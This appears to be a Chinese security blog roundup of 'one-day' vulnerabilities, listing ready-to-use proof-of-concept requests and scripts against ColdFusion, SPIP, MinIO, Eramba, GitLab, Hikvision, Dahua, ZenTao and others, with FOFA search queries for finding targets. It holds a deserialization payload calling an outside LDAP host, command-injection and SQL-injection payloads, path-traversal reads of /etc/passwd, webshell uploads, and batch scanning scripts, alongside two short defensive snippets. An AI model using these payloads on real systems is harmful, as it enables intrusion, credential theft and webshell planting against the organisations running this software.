HW Intelligence - 2023-08-15 - 1day Roundup

月影
2023-08-15 / 0 comments / 55 reads

360 新天擎 (Tianqing) Endpoint Security Management System information disclosure vulnerability

http://ip:port/runtime/admin_log_conf.cache

Adobe ColdFusion deserialization vulnerability CVE-2023-29300

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 1.2.3.4:1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

Coremail mail system unauthenticated access to administrator credentials POC

/coremail/common/assets/;l;/;/;/;/;/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2

CVE-2023-27372 SPIP CMS remote code execution vulnerability

0x01 Vulnerability overview

Vulnerability ID: CVE-2023-27372

SPIP CMS versions before 4.2.1 allow remote code execution through a form value in the public area because serialized data is handled improperly.

0x02 Affected versions

SPIP < 4.2.1
0x03 Reproduction
Method 1: FOFA query: app="SPIP"

POST /spip/spip.php?page=spip_pass HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cibcInit=oui
Content-Length: 215
Content-Type: application/x-www-form-urlencoded

page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

The formulaire_action_args parameter here must be fetched from /spip.php?page=spip_pass; it is the value of the input tag whose name is formulaire_action_args.

From the code above we can clearly see that we executed the phpinfo() function; the result is shown below, which means we successfully reproduced the vulnerability.

exp
https://github.com/Pari-Malam/CVE-2023-27372

CVE-2023-28432 MinIO cluster-mode information disclosure vulnerability: reproduction

0x01 Vulnerability overview

Vulnerability ID: CVE-2023-28432 CNNVD-202303-1795

MinIO is an open-source object storage server from the US company MinIO, Inc.: a high-performance, distributed object storage system. It is a software product that runs entirely on standard hardware, so even low-cost machines such as x86 servers run MinIO well. MinIO contains an information disclosure vulnerability: port 9000, which MinIO cluster nodes use to exchange information, can be reached without authorization by sending a specially crafted HTTP request when it has not been configured, which leaks the environment variables of the MinIO object storage deployment. Those variables include key material, and the leaked data includes the login username and password.

MinIO has an information disclosure vulnerability that stems from MinIO returning all environment variables in a cluster deployment, which leaks that information.

0x02 Affected versions

2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

0x03 Reproduction

Method 1: search with FOFA using the following query syntax:

title="MinIO Browser"

The vulnerability is in the API endpoint http://your-ip:9000/minio/bootstrap/v1/verify; capture and analyze the request with Burp Suite.

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.126.128:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

(The request body is empty; see the original article link for the reproduction screenshots.)
https://mp.weixin.qq.com/s/SXAEQ3WSOSo_sqGTXN7S6Q

Log in to the system with the leaked username and password.
# -*- coding: utf-8 -*-
from urllib.parse import urlsplit
import argparse
import requests
import sys
import re
import threading
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

# Custom request headers
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
    "Content-Type": "application/x-www-form-urlencoded"
}

# The verify endpoint is hit with an empty POST body (see the captured request above)
data = {}

vulurl = []

# Normalize the input (full URL, host, or host:port) and run the check
def urltest(url):
    parsed_url = urlsplit(url)
    # urlsplit().port is an int or None, so compare with an int (the original compared with the string "443")
    if parsed_url.port == 443 and parsed_url.netloc:
        url = "https://" + parsed_url.netloc + "/minio/bootstrap/v1/verify"
        vultest(url)
    elif parsed_url.netloc and parsed_url.path:
        url = parsed_url.scheme + "://" + parsed_url.netloc + "/minio/bootstrap/v1/verify"
        vultest(url)
    elif parsed_url.netloc:
        url = url + "/minio/bootstrap/v1/verify"
        vultest(url)
    elif (not parsed_url.scheme) and parsed_url.path:
        # Bare host without a scheme: try both http and https
        url_1 = "http://" + url + "/minio/bootstrap/v1/verify"
        vultest(url_1)
        url_2 = "https://" + url + "/minio/bootstrap/v1/verify"
        vultest(url_2)
    else:
        # host:port form: urlsplit treats the host as the scheme, so strip any path and rebuild by hand
        modified_string = re.sub(r"[/\\].*", "", url) + "/minio/bootstrap/v1/verify"
        url_1 = "http://" + modified_string
        vultest(url_1)
        url_2 = "https://" + modified_string
        vultest(url_2)

# Vulnerability check: a 200 response whose body contains "MinioEnv" means the environment was returned
def vultest(url):
    try:
        response = requests.post(url, data=data, headers=headers, verify=False, timeout=3)
        parsed_url = urlsplit(url)
        url = parsed_url.scheme + "://" + parsed_url.netloc
        # Check the status code and the leaked-environment marker
        if response.status_code == 200 and ("MinioEnv" in response.text):
            vulurl.append(url)
            print(url + "  [+]漏洞存在!!!")
        else:
            print(url + "  [-]漏洞不存在。")
    except RequestException:
        parsed_url = urlsplit(url)
        url = parsed_url.scheme + "://" + parsed_url.netloc
        print(url + "  [-]请求失败。")


# Read a single URL or a file of URLs
def main():
    # Suppress the certificate warnings caused by verify=False
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
    parser = argparse.ArgumentParser(description="读取命令行参数")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', help='URL 参数')
    group.add_argument('-f', '--file', help='file 参数')
    args = parser.parse_args()
    if args.url:
        urltest(args.url)
    elif args.file:
        # One thread per line of the input file
        threads_queue = []
        with open(args.file, 'r') as file:
            for line in file:
                line = line.strip()
                read_thread = threading.Thread(target=urltest, args=(line,))
                threads_queue.append(read_thread)
                read_thread.start()
            for thread in threads_queue:
                thread.join()

    print("\n存在漏洞列表:")
    for url in vulurl:
        print(url + "  [+]漏洞存在!!!")

if __name__ == "__main__":
    main()

Eramba arbitrary code execution vulnerability

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: [redacted]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether [redacted] brd ff:ff:ff:ff:ff:ff
    inet [redacted] brd [redacted] scope global ens33
       valid_lft forever preferred_lft forever
    inet6 [redacted] scope link
       valid_lft forever preferred_lft forever
&quot;
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'
'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>

GDidees CMS arbitrary file upload vulnerability: reproduction and exploitation analysis

0x01 Vulnerability overview

Vulnerability ID: CVE-2023-27178

GDidees CMS is an open-source French website management tool for building sites and photo or video galleries. GDidees CMS 3.9.1 and earlier contain an arbitrary file upload vulnerability that lets an unauthenticated attacker upload a crafted file and execute arbitrary code.

0x02 Affected versions

GDidees CMS 3.9.1 and earlier.
0x03 Reproduction
Create a one-line webshell file with the phar extension.

Open the Roxy Fileman plugin page.

Upload the webshell.

Requesting the cmd.phar page with the parameter cmd=echo 'csx lab'; shows that the PHP code is executed, which proves the vulnerability exists.

Remediation:
Edit the FORBIDDEN_UPLOADS field in conf.json to forbid uploading files with the phar extension.
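An added example, not from the article and not GDidees CMS or Roxy Fileman code: it applies the remediation above to a conf.json excerpt and mirrors the extension check so the effect can be verified, including the case-variant cmd.PHAR. Assumptions: FORBIDDEN_UPLOADS and ALLOWED_UPLOADS are space-separated extension lists, a non-empty ALLOWED_UPLOADS takes precedence, and the set of extra executable extensions is the editor's, not the project's.

```python
import json

# Constructed excerpt of a Roxy Fileman-style conf.json (not the shipped file);
# assumption: both keys hold space-separated extension lists.
WEAK_CONF = json.dumps({
    "FORBIDDEN_UPLOADS": "php phtml php3 php4 php5 phps jsp asp aspx sh exe",
    "ALLOWED_UPLOADS": "",
})

# Extensions a PHP runtime or common web-server handler may execute; phar is the one
# the PoC above relies on. Assumption: this list is the editor's choice.
EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phps",
                   "phar", "pht", "shtml", "htaccess"}


def harden_conf(conf_text):
    """Return (hardened conf text, sorted list of extensions that were added)."""
    conf = json.loads(conf_text)
    forbidden = set(conf.get("FORBIDDEN_UPLOADS", "").lower().split())
    added = sorted(EXECUTABLE_EXTS - forbidden)
    conf["FORBIDDEN_UPLOADS"] = " ".join(sorted(forbidden | EXECUTABLE_EXTS))
    return json.dumps(conf, indent=2), added


def upload_allowed(filename, conf_text):
    """Model of the extension check: allowlist wins if set, else denylist; case-insensitive."""
    conf = json.loads(conf_text)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    allowed = set(conf.get("ALLOWED_UPLOADS", "").lower().split())
    if allowed:
        return ext in allowed
    return ext not in set(conf.get("FORBIDDEN_UPLOADS", "").lower().split())
```

A denylist is only as good as its completeness; where the site only needs images and documents, populating ALLOWED_UPLOADS is the stronger setting.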

GitLab path traversal arbitrary file read vulnerability

Login may be required
GET /group1/group2/group3/group4/group5/group6/group7/group8/group9/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

HIKVISION iSecure Center integrated security management platform file upload

POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4

--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream

9YPQ3I3ZS


#!/usr/bin/env python
# *-* coding:utf-8 *-*
import sys
import requests
import string
import random
import urllib3
urllib3.disable_warnings()

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',  # 127.0.0.1:8080 proxy so the traffic can be inspected in Burp Suite
}

def run(arg):
    try:
        # Random marker content and random file name used for the check
        flag = ''.join(random.choices(string.ascii_uppercase + string.digits, k=9))
        filename = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        vuln_url = arg + "center/api/files;.js"
        # Defined but never sent: the capture above shows the default python-requests User-Agent
        headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
                   'Accept': '*/*',
                   'Content-Type': 'application/x-www-form-urlencoded'}
        # The path traversal sits in the multipart filename, as in the request above
        file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')}
        r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
        if r.status_code == 200 and "webapps/clusterMgr" in r.text:
            # Request the written file back and look for the marker
            payload = f"clusterMgr/{filename}.txt;.js"
            url = arg + payload
            r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
            if r2.status_code == 200 and flag in r2.text:
                print('\033[1;31;40m')
                print(arg + f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址:{url}")
                print('\033[0m')
        else:
            print(arg + ":不存在漏洞")
    except requests.RequestException:
        print(arg + ":不存在漏洞")


if __name__ == '__main__':
    url = sys.argv[1]  # base URL including the trailing slash
    run(url)

HiKVISION integrated security management platform files arbitrary file upload vulnerability POC

POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a--

----WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell %>
------WebKitFormBoundary9PggsiM755PLa54a--

HiKVISION integrated security management platform report arbitrary file upload vulnerability

POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a--

----WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell %>
------WebKitFormBoundary9PggsiM755PLa54a--


Webshell path: /portal/ui/login/..;/..;/new.jsp

华天动力 (Huatian Dynamics) OA SQL injection

POC:
Visit
http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
Capture the request

POST /report/reportServlet?action=8 HTTP/1.1
Host: xxxx
Content-Length: 145
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3
Connection: close

year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2FshowReport.jsp%3Fraq%3D%252FJourTemp2.raq&currTab=

HiKVISION integrated security management platform env information disclosure

POC:
/artemis-portal/artemis/env

HIKVISION video encoding device access gateway showFile.php arbitrary file download

POC:

Vulnerable source of showFile.php (the fileName parameter is concatenated into the path with no sanitization, so ../ sequences escape the log directory):

<?php
$file_name = $_GET['fileName'];
$file_path = '../../../log/'.$file_name;
$fp = fopen($file_path, "r");
while($line = fgets($fp)){
    $line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
    echo '<span style="font-size:16px">'.$line.'</span>';
}
fclose($fp);
?>
/serverLog/showFile.php?fileName=../web/html/main.php

Dahua (大华) Smart Park integrated management platform video arbitrary file upload vulnerability

POC:

POST /publishing/publishing/material/file/video HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
Path: /publishingImg/VIDEO/230812152005170200.jsp

Dahua (大华) Smart Park integrated management platform getFaceCapture SQL injection vulnerability

POC:
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D
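For the defender side of the URL-based PoCs in this roundup (the MinIO bootstrap verify endpoint, the GitLab uploads traversal, the Eramba download-test-pdf path parameter, the Hikvision artemis env path and the getFaceCapture injection just above), an added example that is not part of the article: a small access-log scanner with one rule per pattern. The log lines, client addresses and the MinIO peer allowlist are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log entries (combined log format); the client
# addresses and hits are illustrative, not captures from real systems.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Aug/2023:10:01:02 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1843
10.0.0.12 - - [15/Aug/2023:10:01:03 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1843
203.0.113.10 - - [15/Aug/2023:10:02:11 +0800] "GET /g1/p9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2210
203.0.113.10 - - [15/Aug/2023:10:03:40 +0800] "GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1" 500 2033469
203.0.113.10 - - [15/Aug/2023:10:04:05 +0800] "GET /artemis-portal/artemis/env HTTP/1.1" 200 5120
203.0.113.10 - - [15/Aug/2023:10:05:17 +0800] "GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1" 500 312
198.51.100.7 - - [15/Aug/2023:10:06:00 +0800] "GET /index.php HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

# Assumption: only these cluster peers may legitimately call the MinIO bootstrap API.
MINIO_PEERS = {"10.0.0.12", "10.0.0.13"}


def match_rules(ip, method, path):
    """Return the names of the roundup's request patterns that this request matches."""
    hits = []
    # Decode twice so %252F-style double encoding cannot hide a traversal, then compare case-insensitively.
    dec = unquote(unquote(path)).lower()
    if method == "POST" and dec.startswith("/minio/bootstrap/v1/verify") and ip not in MINIO_PEERS:
        hits.append("minio-bootstrap-verify-from-non-peer")  # CVE-2023-28432
    if "/uploads/" in dec and "../" in dec:
        hits.append("gitlab-uploads-path-traversal")
    if dec.startswith("/settings/download-test-pdf") and re.search(r"path=[^&]*[;|&$ ]", dec):
        hits.append("eramba-download-test-pdf-shell-metachar")
    if dec.startswith("/artemis-portal/artemis/env"):
        hits.append("hikvision-artemis-env-disclosure")
    if "/getfacecapture/" in dec and re.search(r"updatexml|extractvalue|\bselect\b", dec):
        hits.append("dahua-getfacecapture-sqli")
    return hits


def scan(log_text):
    """Map each triggered rule to the sorted source addresses that triggered it."""
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in match_rules(m["ip"], m["method"], m["path"]):
            findings.setdefault(rule, set()).add(m["ip"])
    return {rule: sorted(ips) for rule, ips in findings.items()}
```

The multipart file-upload PoCs on this page carry their traversal in the request body, which access logs do not record; those need a WAF or application-level log of the multipart filename.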

禅道 (ZenTao) v18.0-v18.3 back-end command execution

POC:

POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Origin: http://127.0.0.1
Connection: close
Cookie: zentaosid=dhjpu2i3g51l6j5eba85aql27f; lang=zh-cn; device=desktop; theme=default; tab=qa; windowWidth=1632; windowHeight=783
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
